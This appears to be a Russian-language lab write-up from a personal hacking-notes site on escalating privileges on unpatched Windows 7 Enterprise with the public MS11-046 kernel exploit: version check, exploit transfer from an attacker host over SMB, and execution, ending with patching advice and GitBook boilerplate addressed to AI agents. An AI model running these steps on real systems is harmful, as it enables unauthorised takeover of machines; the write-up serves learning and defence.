> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/windows-vulnerabilities/kernel-exploitation/windows-7-enterprise-kernel-exploitation.md).

# Windows 7 Enterprise — MS11-046

Это примечание документирует лабораторный случай со старой, не пропатченной целью Windows 7 Enterprise. Эксплуатация ядра всегда должна начинаться с точной проверки версии и установленных обновлений.

## Обнаружение

```powershell
systeminfo
```

Обнаруженная версия:

```
Версия ОС: 6.1.7600 N/A Build 7600
```

<figure><img src="/files/d35407528642f72b61b7569adbcc964955d8ebd9" alt="Windows 7 Enterprise systeminfo output"><figcaption></figcaption></figure>

## Эксплойт MS11-046

{% embed url="<https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046>" %}

<figure><img src="/files/118a92e8d01f31df451cd646d1a57659e5962275" alt="MS11-046 exploit reference"><figcaption></figcaption></figure>

<figure><img src="/files/94695ea7883bcb0ffdc61d94317d079442c9ed9f" alt="MS11-046 exploit file"><figcaption></figcaption></figure>

## Передача через SMB

```bash
smbserver.py share $(pwd) -smb2support
```

```powershell
copy \\10.10.14.26\share\ms11-046.exe ms11.exe
```

<figure><img src="/files/d4dd074398a1553d3e90cef837b47866577d4115" alt="MS11-046 exploit transferred over SMB"><figcaption></figcaption></figure>

## Выполнять

```powershell
./ms11.exe
```

<figure><img src="/files/4c54c62921523d6ffaf9f6469e7d392889dba2b4" alt="MS11-046 privileged execution result"><figcaption></figcaption></figure>

## Ключевые моменты

* Старая сборка Windows — это недостаточно; проверьте установленные хотфиксы.
* Передача через SMB удобна в лабораториях Windows.
* Устраните проблему, установив патчи или выводя устаревшие системы из эксплуатации.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/windows-vulnerabilities/kernel-exploitation/windows-7-enterprise-kernel-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
